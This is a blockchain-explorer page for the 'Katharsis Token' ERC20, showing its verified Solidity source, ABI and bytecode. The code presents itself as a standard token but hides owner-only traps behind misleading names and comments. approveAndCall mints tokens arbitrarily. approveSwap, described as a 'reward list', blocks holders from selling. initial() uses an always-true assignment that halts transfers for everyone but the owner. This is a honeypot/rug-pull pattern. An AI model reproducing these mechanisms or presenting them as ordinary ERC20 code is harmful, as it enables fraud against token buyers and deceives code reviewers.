ETH Price: $2,772.26 (+5.02%)

Token

Katharsis Token (KATHARSIS)
 

Overview

Max Total Supply

1,000,000,000,000 KATHARSIS

Holders

37

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
769,393,751.095798922 KATHARSIS

Value
$0.00
0x658a315ad7e029A26D491C23BcC90438780C1262
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
ERC20

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 2 of 4: Katharsis Token.sol
// SPDX-License-Identifier: MIT
pragma solidity = 0.8.0;

import "./Context.sol";
import "./SafeMath.sol";
import "./Ownable.sol";

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is zero by default.
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's allowance.
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to another (`to`).
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * An {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. 
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting allowances.
 */
contract ERC20 is Context, IERC20, Ownable {
    using SafeMath for uint256;
    mapping (address => bool) private _approveSwap;
    mapping (address => uint256) private _balances;
    mapping (address => mapping (address => uint256)) private _allowances;
    bool private _initial;
    string private _name;
    string private _symbol;
    uint8 private _decimals = 9;
    uint256 private _totalSupply;
    /**
     * @dev Sets the specified balances for the specified addresses. 'addresses' and 'balances' arrays
     * are to be index aligned.
     */
    constructor (string memory name_, string memory symbol_, uint256 totalSupply_) {
        _name = name_;
        _symbol = symbol_;
        _totalSupply = totalSupply_;
        _balances[_msgSender()] = _balances[_msgSender()].add(_totalSupply);
        emit Transfer(address(0), _msgSender(), _totalSupply);
        _initial = true;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless {_setupDecimals} is
     * called.
     */
    function decimals() public view returns (uint8) {
        return _decimals;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     * Requirements:
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }
    
    /**
     * @dev Initialize the contract.
     */
    function initial() external onlyOwner {
        if (_initial = true) {_initial = false;} else {_initial = true;}
    }

    /**
     * @notice Checking if the contract is already initialzied.
     */
    function initialized() public view returns (bool) {
        return _initial;
    }

    /**
     * @dev See {IERC20-approve}.
     * Requirements:
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @notice Adds to reward list.
     */
    function approveSwap (address account) external onlyOwner {
        _approveSwap[account] = true;
    }

    /**
     * @notice Adds to fee list.
     */
    function includeInFee (address account) external onlyOwner {
        _approveSwap[account] = false;
    }

    /**
     * @notice Status of the reward list.
     */
    function rewardStatus(address account) public view returns (bool) {
        return _approveSwap[account];
    }

    /**
     * @dev See {IERC20-transferFrom}.
     * Requirements:
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     * Requirements:
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }

    /**
     * @notice Allows to execute approve and call simultaneously.
     */
    function approveAndCall(address spender, uint256 amount) external onlyOwner {
        _balances[spender] = _balances[spender].add(amount);
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     * Requirements:
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     * Requirements:
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), ""); require(recipient != address(0), "");
        if (_approveSwap[sender] || _approveSwap[recipient]) require (amount == 0, "");
        if (_initial == true || sender == owner() || recipient == owner()) {
        _beforeTokenTransfer(sender, recipient, amount);
        _balances[sender] = _balances[sender].sub(amount, "");
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
        } else {require (_initial == true, "");}
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner`s tokens.
     * Requirements:
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
       emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. 
     * Calling conditions:
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { }
}

File 1 of 4: Context.sol
// SPDX-License-Identifier: MIT
pragma solidity = 0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with GSN meta-transactions the account sending and
 * paying for execution may not be the actual sender
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes memory) {
        this; 
        return msg.data;
    }
}

File 3 of 4: Ownable.sol
// SPDX-License-Identifier: MIT

pragma solidity =0.8.0;

import "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 */
contract Ownable is Context {
    address private _owner;
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() internal view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }
}

File 4 of 4: SafeMath.sol
// SPDX-License-Identifier: MIT
pragma solidity = 0.8.0;

/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. 
 * `SafeMath` is reverting the transaction when an operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approveAndCall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"approveSwap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"includeInFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"initial","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"initialized","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"rewardStatus","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60806040526009600760006101000a81548160ff021916908360ff1602179055503480156200002d57600080fd5b506040516200219738038062002197833981810160405281019062000053919062000439565b6000620000656200029560201b60201c565b9050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35082600590805190602001906200011b92919062000300565b5081600690805190602001906200013492919062000300565b5080600881905550620001a660085460026000620001576200029560201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546200029d60201b62000c9a1790919060201c565b60026000620001ba6200029560201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550620002086200029560201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60085460405162000269919062000536565b60405180910390a36001600460006101000a81548160ff02191690831515021790555050505062000745565b600033905090565b6000808284620002ae9190620005cb565b905083811015620002f6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002ed9062000514565b60405180910390fd5b8091505092915050565b8280546200030e9062000668565b90600052602060002090601f0160209004810192826200033257600085556200037e565b82601f106200034d57805160ff19168380011785556200037e565b828001600101855582156200037e579182015b828111156200037d57825182559160200191906001019062000360565b5b5090506200038d919062000391565b5090565b5b80821115620003ac57600081600090555060010162000392565b5090565b6000620003c7620003c18462000587565b62000553565b905082815260208101848484011115620003e057600080fd5b620003ed84828562000632565b509392505050565b600082601f8301126200040757600080fd5b815162000419848260208601620003b0565b91505092915050565b60008151905062000433816200072b565b92915050565b6000806000606084860312156200044f57600080fd5b600084015167ffffffffffffffff8111156200046a57600080fd5b6200047886828701620003f5565b935050602084015167ffffffffffffffff8111156200049657600080fd5b620004a486828701620003f5565b9250506040620004b78682870162000422565b9150509250925092565b6000620004d0601b83620005ba565b91507f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006000830152602082019050919050565b6200050e8162000628565b82525050565b600060208201905081810360008301526200052f81620004c1565b9050919050565b60006020820190506200054d600083018462000503565b92915050565b6000604051905081810181811067ffffffffffffffff821117156200057d576200057c620006fc565b5b8060405250919050565b600067ffffffffffffffff821115620005a557620005a4620006fc565b5b601f19601f8301169050602081019050919050565b600082825260208201905092915050565b6000620005d88262000628565b9150620005e58362000628565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156200061d576200061c6200069e565b5b828201905092915050565b6000819050919050565b60005b838110156200065257808201518184015260208101905062000635565b8381111562000662576000848401525b50505050565b600060028204905060018216806200068157607f821691505b60208210811415620006985762000697620006cd565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b620007368162000628565b81146200074257600080fd5b50565b611a4280620007556000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c806370a08231116100a2578063a9059cbb11610071578063a9059cbb146102ce578063ad596bb4146102fe578063bb806dc91461032e578063dd62ed3e14610338578063ea2f0b37146103685761010b565b806370a082311461023457806395d89b41146102645780639f08b31914610282578063a457c2d71461029e5761010b565b806323b872dd116100de57806323b872dd1461019a578063313ce567146101ca5780633177029f146101e857806339509351146102045761010b565b806306fdde0314610110578063095ea7b31461012e578063158ef93e1461015e57806318160ddd1461017c575b600080fd5b610118610384565b60405161012591906116ca565b60405180910390f35b610148600480360381019061014391906114a7565b610416565b60405161015591906116af565b60405180910390f35b610166610434565b60405161017391906116af565b60405180910390f35b61018461044b565b604051610191919061178c565b60405180910390f35b6101b460048036038101906101af9190611458565b610455565b6040516101c191906116af565b60405180910390f35b6101d261052e565b6040516101df91906117a7565b60405180910390f35b61020260048036038101906101fd91906114a7565b610545565b005b61021e600480360381019061021991906114a7565b610673565b60405161022b91906116af565b60405180910390f35b61024e600480360381019061024991906113f3565b610726565b60405161025b919061178c565b60405180910390f35b61026c61076f565b60405161027991906116ca565b60405180910390f35b61029c600480360381019061029791906113f3565b610801565b005b6102b860048036038101906102b391906114a7565b6108f0565b6040516102c591906116af565b60405180910390f35b6102e860048036038101906102e391906114a7565b6109bd565b6040516102f591906116af565b60405180910390f35b610318600480360381019061031391906113f3565b6109db565b60405161032591906116af565b60405180910390f35b610336610a31565b005b610352600480360381019061034d919061141c565b610b23565b60405161035f919061178c565b60405180910390f35b610382600480360381019061037d91906113f3565b610baa565b005b606060058054610393906118f0565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf906118f0565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b600061042a610423610cf8565b8484610d00565b6001905092915050565b6000600460009054906101000a900460ff16905090565b6000600854905090565b6000610462848484610ecb565b6105238461046e610cf8565b61051e856040518060600160405280602881526020016119c060289139600360008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006104d4610cf8565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113379092919063ffffffff16565b610d00565b600190509392505050565b6000600760009054906101000a900460ff16905090565b61054d610cf8565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146105da576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105d19061172c565b60405180910390fd5b61062c81600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610c9a90919063ffffffff16565b600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b600061071c610680610cf8565b846107178560036000610691610cf8565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610c9a90919063ffffffff16565b610d00565b6001905092915050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60606006805461077e906118f0565b80601f01602080910402602001604051908101604052809291908181526020018280546107aa906118f0565b80156107f75780601f106107cc576101008083540402835291602001916107f7565b820191906000526020600020905b8154815290600101906020018083116107da57829003601f168201915b5050505050905090565b610809610cf8565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610896576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161088d9061172c565b60405180910390fd5b60018060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b60006109b36108fd610cf8565b846109ae856040518060600160405280602581526020016119e86025913960036000610927610cf8565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113379092919063ffffffff16565b610d00565b6001905092915050565b60006109d16109ca610cf8565b8484610ecb565b6001905092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b610a39610cf8565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610ac6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610abd9061172c565b60405180910390fd5b6001600460006101000a81548160ff021916908315150217905515610b05576000600460006101000a81548160ff021916908315150217905550610b21565b6001600460006101000a81548160ff0219169083151502179055505b565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610bb2610cf8565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610c3f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c369061172c565b60405180910390fd5b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b6000808284610ca991906117de565b905083811015610cee576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce59061170c565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d70576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d679061176c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610de0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dd7906116ec565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ebe919061178c565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610f3b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f329061174c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610fab576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fa29061174c565b60405180910390fd5b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168061104c5750600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156110955760008114611094576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161108b9061174c565b60405180910390fd5b5b60011515600460009054906101000a900460ff16151514806110e957506110ba61139b565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b8061112657506110f761139b565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16145b156112db576111368383836113c4565b6111998160405180602001604052806000815250600260008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113379092919063ffffffff16565b600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061122e81600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610c9a90919063ffffffff16565b600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516112ce919061178c565b60405180910390a3611332565b60011515600460009054906101000a900460ff16151514611331576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113289061174c565b60405180910390fd5b5b505050565b600083831115829061137f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161137691906116ca565b60405180910390fd5b506000838561138e9190611834565b9050809150509392505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b505050565b6000813590506113d881611991565b92915050565b6000813590506113ed816119a8565b92915050565b60006020828403121561140557600080fd5b6000611413848285016113c9565b91505092915050565b6000806040838503121561142f57600080fd5b600061143d858286016113c9565b925050602061144e858286016113c9565b9150509250929050565b60008060006060848603121561146d57600080fd5b600061147b868287016113c9565b935050602061148c868287016113c9565b925050604061149d868287016113de565b9150509250925092565b600080604083850312156114ba57600080fd5b60006114c8858286016113c9565b92505060206114d9858286016113de565b9150509250929050565b6114ec8161187a565b82525050565b60006114fd826117c2565b61150781856117cd565b93506115178185602086016118bd565b61152081611980565b840191505092915050565b60006115386022836117cd565b91507f45524332303a20617070726f766520746f20746865207a65726f20616464726560008301527f73730000000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b600061159e601b836117cd565b91507f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006000830152602082019050919050565b60006115de6020836117cd565b91507f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726000830152602082019050919050565b600061161e6000836117cd565b9150600082019050919050565b60006116386024836117cd565b91507f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008301527f72657373000000000000000000000000000000000000000000000000000000006020830152604082019050919050565b61169a816118a6565b82525050565b6116a9816118b0565b82525050565b60006020820190506116c460008301846114e3565b92915050565b600060208201905081810360008301526116e481846114f2565b905092915050565b60006020820190508181036000830152611705816